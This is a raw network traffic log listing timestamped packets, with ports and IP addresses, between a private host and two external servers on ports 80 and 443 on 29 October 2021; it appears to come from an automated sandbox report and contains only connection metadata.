Oct 29, 2021 20:50:19.376677036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376677036 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.376688957 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.376701117 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.376723051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376746893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376820087 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376820087 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.376869917 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376869917 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376871109 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.376879930 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376885891 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.376909971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376919985 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.376924038 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376933098 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376945019 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.376952887 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.376955032 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376975060 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376981020 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377006054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377013922 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.377022028 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.377028942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377033949 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.377053976 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377068996 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.377075911 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377098083 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377134085 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.377142906 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377166986 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377188921 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377192020 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.377228975 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.377574921 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377603054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377621889 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.377626896 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377650976 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.377655983 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.377667904 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.377675056 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.377691984 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.377717018 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.377737999 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.378386974 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.378463984 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.378496885 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.378525972 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.378542900 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.378587008 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.379616022 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.379714012 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.380139112 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.380228996 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.380244017 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.380991936 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.381041050 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.381062984 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.381078959 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.381103039 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.381746054 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.381799936 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.381809950 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.381844997 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.382513046 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.382586956 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.383337975 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.383461952 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.384084940 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.384141922 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.384171009 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.384186029 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.384198904 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.384227991 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.393718958 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.393938065 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.394490957 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.394536018 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.394568920 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.394579887 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.394592047 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.395251036 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.395332098 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.395345926 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.395395041 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.396576881 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.396625042 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.396658897 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.396676064 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.396687984 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.396718025 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.397113085 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.397156954 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.397186041 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.397198915 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.397212029 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.397239923 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.397996902 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.398046017 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.398145914 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.398163080 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.398174047 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.398221016 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.398833036 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.398945093 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.399653912 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.399709940 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.399749994 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.399784088 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.399794102 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.400468111 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.400564909 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.400582075 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.400638103 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.401118040 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.401170969 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.401205063 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.401221037 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.401251078 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.401277065 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.401981115 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.402066946 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.402807951 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.402854919 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.402893066 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.402909040 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.402940035 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.403604031 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.403646946 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.403666019 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.403681040 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.403726101 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.404695034 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.404781103 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.405034065 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.405076981 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.405112982 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.405124903 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.405153990 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.405178070 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.405947924 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.405993938 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.406075954 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.406092882 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.406150103 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.406914949 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.406964064 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.407001972 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.407012939 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.407037973 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.407072067 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.407823086 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.407877922 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.407922029 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.407933950 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.407983065 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.410795927 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.410862923 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.410892963 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.410907030 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.410938978 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.410962105 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.411194086 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.411201954 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.411247969 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.411282063 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.412964106 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.412997007 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.413058996 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.413069010 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.413106918 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.413127899 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.414732933 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.414772034 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.414829016 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.414845943 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.414876938 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.414901972 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.415653944 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.415692091 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.415743113 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.415760040 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.415771961 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.415802956 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.416212082 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.416495085 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.417486906 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.417524099 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.417603970 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.417622089 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.417665958 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.419019938 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.419055939 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.419126987 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.419146061 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.419156075 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.419188023 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.419231892 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.420031071 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.420064926 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.420113087 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.420125008 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.420165062 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.420192957 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.420775890 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.420929909 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.421027899 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.421056032 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.421111107 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.421586037 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.423990965 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.429362059 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429395914 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429419041 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429440022 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429461956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429483891 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429511070 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429510117 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429532051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429558992 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429560900 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429580927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429589033 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429634094 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429652929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429677010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429699898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429721117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429723978 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429748058 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429759979 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429771900 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429794073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429815054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429816961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429837942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429858923 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429861069 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429886103 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429898024 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.429908037 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.429954052 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430119038 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430150032 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430176973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430192947 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430205107 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430233002 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430246115 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430263042 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430289984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430303097 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430318117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430346012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430356979 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430373907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430403948 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430413008 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430433989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430461884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430474997 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430493116 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430521011 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430531979 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430547953 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430574894 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430589914 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430607080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430635929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430650949 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430665016 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430692911 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430708885 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430795908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430824995 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430843115 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.430854082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.430893898 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.431001902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.431055069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.431126118 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.481990099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482031107 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482055902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482081890 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482090950 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482105970 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482130051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482137918 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482153893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482172966 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482197046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482198000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482223988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482245922 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482286930 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482312918 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482340097 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482386112 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482403994 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482430935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482455015 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482475042 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482480049 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482508898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482523918 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482533932 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482561111 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482573986 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482587099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482610941 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482628107 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482634068 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482681036 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482808113 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482832909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482872963 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482904911 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482933044 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482956886 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.482971907 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.482980013 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483040094 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483043909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483071089 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483094931 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483114004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483175039 CEST	49855	80	192.168.2.4	185.98.87.159
